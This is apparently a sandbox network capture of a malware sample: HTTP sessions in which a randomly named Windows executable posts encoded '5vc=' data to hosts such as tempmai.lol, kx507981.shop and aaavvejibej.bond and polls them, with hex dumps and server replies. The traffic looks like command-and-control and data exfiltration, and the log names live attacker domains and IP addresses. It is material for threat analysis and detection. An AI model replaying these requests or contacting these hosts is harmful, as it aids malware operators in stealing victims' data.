                                                                                                                                            Oct 10, 2024 12:53:30.883569956 CEST802INHTTP/1.1 200 OK
                                                                                                                                            server: openresty/1.13.6.1
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:30 GMT
                                                                                                                                            content-type: text/html
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            content-encoding: gzip
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 32 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 5b 6f da 30 14 7e ef af c8 f2 50 6d d2 20 17 4a 29 6b dc 89 5e 60 a0 4c 74 2d 05 c2 4b e5 d8 06 9b fa 92 26 4e 0c 9a f6 df 17 42 55 52 b1 87 f9 c1 3e e7 f8 dc be ef d8 c1 a7 db f1 cd 24 ba bf b3 a8 16 fc ea 24 d8 1d 16 87 72 05 6c 22 ed ab 13 ab 5c 01 25 10 ef c5 4a 15 44 43 0b 51 98 66 44 03 fb 69 d2 6f 5c bc 79 1e ae a9 d6 49 83 bc e6 ac 00 f6 a6 91 c3 06 52 22 81 9a c5 9c d8 16 52 52 13 59 c6 0e ef 00 c1 2b 72 14 2d a1 20 c0 2e 18 31 89 4a 75 2d c0 30 ac 29 c0 a4 60 88 34 2a e5 ab c5 24 d3 0c f2 46 86 20 27 c0 6b ba f5 74 9a 69 4e ae 02 67 7f 56 70 aa 26 a5 ca 50 ca 12 7d 80 f5 ef de 53 b2 4c 49 46 6b 2d b8 97 79 ca c1 0e df 37 c7 31 c6 74 dc a6 26 22 11 90 35 b9 e2 8e 6d 39 87 9c 81 73 5c 27 a8 e8 ab f3 73 5c a3 fd 9f 35 02 e7 30 9a 20 56 78 6b 29 c9 15 c4 c0 c6 ea 79 2f 7e fe 52 a7 63 0f da d2 db a4 e4 57 93 8d 76 d6 b0 80 7b 6b cd 6f c7 c5 32 97 48 33 25 ad 5a 2a eb f7 3b 83 3b 97 dd 32 4c 62 65 9a 5a 25 25 7c 54 4e 58 c9 26 2d 11 59 c0 b2 0f [TRUNCATED]
                                                                                                                                            Data Ascii: 262S[o0~Pm J)k^`Lt-K&NBUR>$$rl"\%JDCQfDio\yIR"RRY+r- .1Ju-0)`4*$F 'ktiNgVp&P}SLIFk-y71t&"5m9s\'s\50 Vxk)y/~RcWv{ko2H3%Z*;;2LbeZ%%|TNX&-Y$}HK}t[3nw=^;0]elG/lz,BH|x3t$b1qv?][|ZG<t<P?5ss>u|?+deo`D~no~$K"6aH28*bk^k&%M"X`>nEh-/#N>_}0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            31192.168.2.66142145.33.18.44805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:33.085818052 CEST1801OUTPOST /m2fa/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.tempmai.lol
                                                                                                                                            Origin: http://www.tempmai.lol
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.tempmai.lol/m2fa/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 51 7a 44 5a 76 37 2f 53 49 6a 4a 57 4e 6d 4b 39 43 35 38 34 53 2b 70 6d 52 39 75 4e 37 4c 34 61 67 2f 70 53 2b 70 4b 44 4e 49 4b 30 59 64 6f 76 47 64 48 6a 74 30 43 37 6a 35 56 47 37 41 4c 32 62 6c 45 45 73 6a 75 75 72 44 44 59 43 2f 48 46 39 38 48 72 38 50 4a 69 6a 50 73 44 6a 4d 43 39 70 61 6f 37 74 45 54 63 2b 7a 30 4e 61 51 44 65 7a 72 44 4f 43 46 62 2f 42 32 44 5a 6d 7a 52 57 51 6c 37 48 44 31 51 76 39 42 71 41 4f 6a 76 7a 72 42 38 33 77 2f 52 57 42 6d 4e 44 70 6c 52 4e 36 46 57 59 45 57 5a 74 55 31 67 69 7a 47 6d 6f 62 54 6a 6d 53 6a 44 74 68 7a 44 73 36 51 72 45 68 31 74 32 65 64 58 6c 68 32 2f 4a 6b 33 46 76 55 52 30 63 56 4f 74 6f 67 47 77 71 6e 7a 43 49 59 75 51 61 67 48 48 6c 2b 56 47 37 50 58 4f 74 54 39 6a 42 75 4d 7a 39 6a 47 35 4f 76 50 79 6d 69 4c 4f 30 4f 63 7a 62 65 72 78 31 70 4a 6d 54 66 44 43 77 64 78 49 70 6d 53 6b 2f 52 6c 4e 47 65 44 41 49 57 74 58 69 43 39 56 38 47 66 50 76 6c 46 47 78 6c 6f 69 52 54 56 75 49 69 52 4d 6e 32 36 2f 41 54 43 67 6b 4b 77 37 4a 67 48 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=QzDZv7/SIjJWNmK9C584S+pmR9uN7L4ag/pS+pKDNIK0YdovGdHjt0C7j5VG7AL2blEEsjuurDDYC/HF98Hr8PJijPsDjMC9pao7tETc+z0NaQDezrDOCFb/B2DZmzRWQl7HD1Qv9BqAOjvzrB83w/RWBmNDplRN6FWYEWZtU1gizGmobTjmSjDthzDs6QrEh1t2edXlh2/Jk3FvUR0cVOtogGwqnzCIYuQagHHl+VG7PXOtT9jBuMz9jG5OvPymiLO0Oczberx1pJmTfDCwdxIpmSk/RlNGeDAIWtXiC9V8GfPvlFGxloiRTVuIiRMn26/ATCgkKw7JgH/pkdL6RWqGaJnstO1nsAXB08y2pfFjOECB+/56laPG/EFQWGRodKgv67cmsiSCjq2RJDh1C5Fu3eCLVazz2/vBEK0nMdvFPGv1g7CvZ+EKaoisIYFpD9OrHVyTHDrCEdc5qablfTWqwaD3IDIxfo8fM4dFOAZlRoAlarfkCRXLy2WRnXQZU+FUwCgJj9OSzQdJ6aOiIL3uJBWu0T/xZJSFH4CJqx8ohOyxsBSe06MrznJUU4txqxTTqQEu0LAgP+ArbhUY2v3uHmpa8yLD1/+Ii3fs93GZCv09cYSmBy/y20FRXfxWNif80VWQpFeyNDjB+3I+hCUquWtzqF8MdWDuWF+/lShteV5o4mkEpsw3QfvBdLsYpI/o/DO2Y8K2Z9pwj4vJEl7mK3FuwLRuMI7ZnLU9YS4cckVN1N7Jgv61qNg5fNYmJuQa+FALTuLtj+dkvbVIF+J0RI3thZfPS4DDOVZc7V5TNX1AK4OMLzkRiT5b6D8+oQYgafH+VO2RfDkIPR7oBUbF9DwNNa1Trr2or8pfwAd11h6m2eRUPOhFFb8IhOniV5jhzSGTPJJEz+uAAGgz09tEmEJF6UiR9BCrbgEYjOreNEI7ZAf6DDmYRQ3OPQS/Ck5sBM48/YjJAV/EW7u4XhLuO99s5m83LPdsrWhbtxG4ips4 [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:53:33.603764057 CEST805INHTTP/1.1 200 OK
                                                                                                                                            server: openresty/1.13.6.1
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:33 GMT
                                                                                                                                            content-type: text/html
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            content-encoding: gzip
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 da 30 10 bd e7 57 b8 3e 64 da 99 82 3f 08 01 1a 2b 1d 42 02 85 71 87 34 21 80 b9 64 64 49 60 11 7d 38 b6 6c e1 e9 f4 bf d7 98 4c 70 86 1e aa 83 a5 5d ef db dd f7 56 f2 3e dd 4e 07 b3 e0 fe ce 88 14 67 d7 67 de 7e 33 18 14 1b 60 12 61 5e 9f 19 e5 f2 22 02 f1 e1 58 99 9c 28 68 a0 08 26 29 51 c0 7c 9a 0d 1b dd b7 c8 e3 ef 48 a9 b8 41 5e 33 9a 03 73 d7 c8 60 03 49 1e 43 45 43 46 4c 03 49 a1 88 28 b1 e3 3b 40 f0 86 9c a0 05 e4 04 98 39 25 3a 96 89 aa 01 34 c5 2a 02 98 e4 14 91 46 65 7c 35 a8 a0 8a 42 d6 48 11 64 04 38 4d bb 9e 4e 51 c5 c8 b5 67 1d f6 8a 4e d5 a4 90 29 4a 68 ac 8e b4 fe dd 7b 42 d6 09 49 a3 5a 0b f6 55 96 30 b0 e7 f7 cd b2 b4 d6 1d bb a9 08 8f 39 a4 4d 26 99 65 1a d6 31 a7 67 9d d6 f1 2a f9 ea fa 9c d6 68 ff 67 0d cf 3a 8e c6 0b 25 2e 0c 29 98 84 18 98 58 3e 1f 8e 9f bf d4 e5 38 90 36 54 11 97 fa 2a b2 53 d6 16 e6 f0 e0 ad c5 ed b5 58 67 02 29 2a 85 51 4b 65 fc 7e 57 70 1f b2 5f 9a 0a 2c 75 53 c9 b8 a4 8f ca 09 4b d1 8c 4a 46 06 30 [TRUNCATED]
                                                                                                                                            Data Ascii: 265SMs0W>d?+Bq4!ddI`}8lLp]V>Ngg~3`a^"X(h&)Q|HA^3s`ICECFLI(;@9%:4*Fe|5BHd8MNQgN)Jh{BIZU09M&e1g*hg:%.)X>86T*SXg)*QKe~Wp_,uSKJF0H$~9'(NKm{:v\$0:}vwiT/qe#>!M$n,^pKc7c>\AW:7:m|C"'F]C.zTxv~6}b(Vs+kc0D?'ZOy?[/dlo7'5D/b~Qrla]0?gogK!0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            32192.168.2.66142345.33.18.44805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:35.677773952 CEST504OUTGET /m2fa/?5vc=dxr5sM7JCjMGBGCjIKoGXP57auD2woMmhc019revMrXoU+YJAMGjsVqej+5clXTWRUV25xXwqTTfL+6H/dW45fVBvf5lv9WIouIxkQPPkB4gfD2v1rHBNnilbi/howM7CAP8IRw=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.tempmai.lol
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:53:36.170260906 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            server: openresty/1.13.6.1
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:36 GMT
                                                                                                                                            content-type: text/html
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 34 41 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 74 65 6d 70 6d 61 69 [TRUNCATED]
                                                                                                                                            Data Ascii: 4A8<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.tempmai.lol/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.tempmai.lol/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.tempmai.lol/m2fa?gp=1&js=1&uuid=1728557616.0093649002&other_args=eyJ1cmkiOiAiL20yZmEiLCAiYXJncyI6ICI1dmM9ZHhyNXNNN0pDak1HQkdDaklLb0dYUDU3YXVEMndvTW1oYzAxOXJldk1yWG9VK1lKQU1HanNWcWVqKzVjbFhUV1JVVjI1eFh3cVRUZkwrNkgvZFc0NWZWQnZmNWx2OVdJb3VJeGtRUFBrQjRnZkQydjFySEJObmlsYmkvaG93TTdDQVA4SVJ3PSZsTFlMPWt2VVgiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljY [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:53:36.170277119 CEST124INData Raw: 6a 74 78 50 54 41 75 4f 43 78 68 63 48 42 73 61 57 4e 68 64 47 6c 76 62 69 39 7a 61 57 64 75 5a 57 51 74 5a 58 68 6a 61 47 46 75 5a 32 55 37 64 6a 31 69 4d 7a 74 78 50 54 41 75 4e 79 4a 39 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                                                                                                                            Data Ascii: jtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNyJ9"; } </script> </body></html>0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            33192.168.2.66142454.67.42.145805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:41.649804115 CEST770OUTPOST /2i23/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.kx507981.shop
                                                                                                                                            Origin: http://www.kx507981.shop
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.kx507981.shop/2i23/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 57 49 6f 65 74 35 31 58 62 71 59 44 4c 38 30 64 64 46 37 49 49 6c 6b 39 33 35 45 63 44 70 65 58 4f 6b 70 53 4a 32 72 75 6d 30 39 50 32 42 6d 44 61 72 62 59 6f 32 37 72 49 6c 59 75 54 37 50 35 65 39 31 32 4e 47 77 41 49 46 35 65 2b 42 64 35 78 75 52 53 54 50 6c 35 6e 32 6b 6f 36 4e 77 31 36 36 62 54 73 36 2b 44 36 58 77 2b 79 52 72 43 2f 4b 4d 4a 37 48 37 68 32 66 46 35 4e 37 31 6c 54 58 5a 52 61 42 53 6c 77 75 39 79 65 7a 65 66 75 65 58 34 67 34 72 57 57 74 35 6a 4b 74 6e 2f 66 77 34 65 4a 37 4f 46 31 56 44 63 75 69 57 56 78 46 38 41 33 71 52 2f 6f 69 6a 56 51 47 70 74 2f 65 6b 4b 37 66 42 64 64 4f 55 67
                                                                                                                                            Data Ascii: 5vc=WIoet51XbqYDL80ddF7IIlk935EcDpeXOkpSJ2rum09P2BmDarbYo27rIlYuT7P5e912NGwAIF5e+Bd5xuRSTPl5n2ko6Nw166bTs6+D6Xw+yRrC/KMJ7H7h2fF5N71lTXZRaBSlwu9yezefueX4g4rWWt5jKtn/fw4eJ7OF1VDcuiWVxF8A3qR/oijVQGpt/ekK7fBddOUg
                                                                                                                                            Oct 10, 2024 12:53:42.473723888 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                            content-type: text/plain
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:42 GMT
                                                                                                                                            content-length: 0
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                            cache-control: no-cache, no-store, must-revalidate
                                                                                                                                            expires: 631152000000
                                                                                                                                            location: http://kx507945.shop
                                                                                                                                            Oct 10, 2024 12:53:42.475938082 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                            content-type: text/plain
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:42 GMT
                                                                                                                                            content-length: 0
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                            cache-control: no-cache, no-store, must-revalidate
                                                                                                                                            expires: 631152000000
                                                                                                                                            location: http://kx507945.shop


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            34192.168.2.66142554.67.42.145805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:44.201814890 CEST794OUTPOST /2i23/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.kx507981.shop
                                                                                                                                            Origin: http://www.kx507981.shop
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.kx507981.shop/2i23/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 57 49 6f 65 74 35 31 58 62 71 59 44 4b 63 45 64 51 45 37 49 4f 46 6c 50 72 4a 45 63 4a 4a 65 62 4f 6b 74 53 4a 33 76 48 68 43 46 50 76 6a 4f 44 62 75 76 59 74 32 37 72 44 46 59 6e 64 62 4f 37 65 39 4a 2b 4e 48 38 41 49 45 5a 65 2b 44 46 35 78 64 35 54 53 66 6c 42 68 32 6b 75 6c 64 77 31 36 36 62 54 73 36 71 70 36 57 59 2b 7a 68 62 43 34 62 4d 49 6b 33 36 54 78 66 46 35 4a 37 31 68 54 58 5a 7a 61 45 36 66 77 73 46 79 65 78 57 66 75 76 58 33 72 34 72 51 62 4e 34 7a 4f 63 65 58 58 52 31 76 49 6f 32 78 68 33 50 61 69 30 58 50 74 32 38 6a 6c 36 78 39 6f 67 37 6e 51 6d 70 48 39 65 63 4b 70 49 4e 36 53 36 78 44 33 73 64 7a 5a 52 64 54 46 72 65 59 47 7a 70 44 51 59 6a 2b 69 77 3d 3d
                                                                                                                                            Data Ascii: 5vc=WIoet51XbqYDKcEdQE7IOFlPrJEcJJebOktSJ3vHhCFPvjODbuvYt27rDFYndbO7e9J+NH8AIEZe+DF5xd5TSflBh2kuldw166bTs6qp6WY+zhbC4bMIk36TxfF5J71hTXZzaE6fwsFyexWfuvX3r4rQbN4zOceXXR1vIo2xh3Pai0XPt28jl6x9og7nQmpH9ecKpIN6S6xD3sdzZRdTFreYGzpDQYj+iw==
                                                                                                                                            Oct 10, 2024 12:53:44.769345045 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                            content-type: text/plain
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:44 GMT
                                                                                                                                            content-length: 0
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                            cache-control: no-cache, no-store, must-revalidate
                                                                                                                                            expires: 631152000000
                                                                                                                                            location: http://kx507945.shop


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            35192.168.2.66142654.67.42.145805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:47.278078079 CEST1807OUTPOST /2i23/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.kx507981.shop
                                                                                                                                            Origin: http://www.kx507981.shop
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.kx507981.shop/2i23/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 57 49 6f 65 74 35 31 58 62 71 59 44 4b 63 45 64 51 45 37 49 4f 46 6c 50 72 4a 45 63 4a 4a 65 62 4f 6b 74 53 4a 33 76 48 68 43 4e 50 76 77 32 44 61 4a 44 59 71 32 37 72 4b 6c 59 71 64 62 50 6a 65 35 6c 36 4e 48 68 33 49 41 70 65 2f 6d 5a 35 33 73 35 54 63 66 6c 42 74 57 6b 72 36 4e 78 6f 36 2b 2f 58 73 36 36 70 36 57 59 2b 7a 6a 54 43 75 61 4d 49 33 6e 37 68 32 66 46 6c 4e 37 31 5a 54 58 52 4a 61 45 2b 31 77 64 6c 79 66 52 6d 66 39 74 2f 33 6f 59 72 53 63 4e 35 32 4f 64 69 49 58 52 6f 44 49 70 44 6d 68 33 37 61 6d 43 57 77 77 6b 73 59 78 62 4a 41 39 54 44 66 5a 69 64 77 36 75 59 54 73 61 41 4a 5a 2b 31 68 78 36 55 72 53 67 73 4f 41 72 58 30 65 6b 51 76 5a 59 36 76 30 4f 72 58 73 44 68 58 50 42 77 30 77 4b 45 2b 6f 4b 61 6b 55 42 2f 33 77 71 6f 44 68 66 59 2b 53 38 66 39 51 6f 64 4f 56 78 46 4c 36 58 45 47 61 44 45 76 55 42 30 37 78 6c 47 76 6d 7a 6e 46 35 57 4b 46 30 5a 45 2b 53 4c 32 64 75 75 33 51 43 64 38 59 4d 42 54 4f 4b 47 46 4d 68 71 50 53 46 75 39 30 47 52 61 6a 34 35 57 6f 68 41 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=WIoet51XbqYDKcEdQE7IOFlPrJEcJJebOktSJ3vHhCNPvw2DaJDYq27rKlYqdbPje5l6NHh3IApe/mZ53s5TcflBtWkr6Nxo6+/Xs66p6WY+zjTCuaMI3n7h2fFlN71ZTXRJaE+1wdlyfRmf9t/3oYrScN52OdiIXRoDIpDmh37amCWwwksYxbJA9TDfZidw6uYTsaAJZ+1hx6UrSgsOArX0ekQvZY6v0OrXsDhXPBw0wKE+oKakUB/3wqoDhfY+S8f9QodOVxFL6XEGaDEvUB07xlGvmznF5WKF0ZE+SL2duu3QCd8YMBTOKGFMhqPSFu90GRaj45WohAdqqJxshj3QtVQlJZeFst/h8kmaZ05z3C3Hhdyw6vWLdhYEJ8CLlx/EgM2gEcVCa3WsvJjT+iRy2sIK1aGAVF7NScy5e9rPGWpGYCxVPfUZGkJPYfIV2Mkf0tJfs3cjZxryBedRMISpGlxknmkT7GTVPlcFWcuy97X+OPQylCcfuHtdvMj3YfBJkTs08/GwV8XdBWeN8WIFrphFhr+yKA3hvOg6H1PrBBHMU6Kvbia43SdLLLwYTVaVmcZqiRWF2e+DdzpO4CLU2i5wr4VJ+v/ZLl9/RPBEhFSCSfww+Qle5aQFNV0jsDy9ZWc86RTQ1QOb4qOhXBQuXZQgJZEyGg6jla8hhTk3i/5sduVU1sDZRnbtTND4Khgj36N4UUWh5tKHFXqFFe98JUh5ZuRFRLkejq9o+gvS6KCioKVip8zuXwtezJogABClEwNCa2DHpNJbv5eyZ4VVQikHmqtE4/xoeTP9tG/Rx9YdpI+iUbJ6yMC+tvCpnRIy+SUTsO05f4KzhQ/EbP1Urt2DMpmf2qXz3+udnWd69gjh1WUWKjH0DHyhGqXk1oLWxAba8q+SzCXjRcKlxq9qmT3cOwI7oJWtBNmaNc+YU8WBI6VI/WPmBmwfc+3aNg29oGMGJO58HI6qysx/f7lsu3OzkonC7CVWA0ozkuNiNX/J [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:53:47.939517021 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                            content-type: text/plain
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:47 GMT
                                                                                                                                            content-length: 0
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                            cache-control: no-cache, no-store, must-revalidate
                                                                                                                                            expires: 631152000000
                                                                                                                                            location: http://kx507945.shop


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            36192.168.2.66142754.67.42.145805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:49.823879957 CEST506OUTGET /2i23/?5vc=bKA+uOpFda5dGdFXdnTLNkRmhJBOP9S0HCpQNG3UnGEkxT/oTZLAjGTvHx4TKdTffd9QN0N/OlpfyxtP6tcBddlohGt5l/spne/Xm9eGrkU+7BisppRJ0X6uxZ9HBJ4oDTdSaxo=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.kx507981.shop
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:53:50.392728090 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                            content-type: text/plain
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:50 GMT
                                                                                                                                            content-length: 0
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                            cache-control: no-cache, no-store, must-revalidate
                                                                                                                                            expires: 631152000000
                                                                                                                                            location: http://kx507945.shop


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            37192.168.2.661428172.67.181.150805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:55.445986986 CEST779OUTPOST /m3ct/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.aaavvejibej.bond
                                                                                                                                            Origin: http://www.aaavvejibej.bond
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.aaavvejibej.bond/m3ct/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
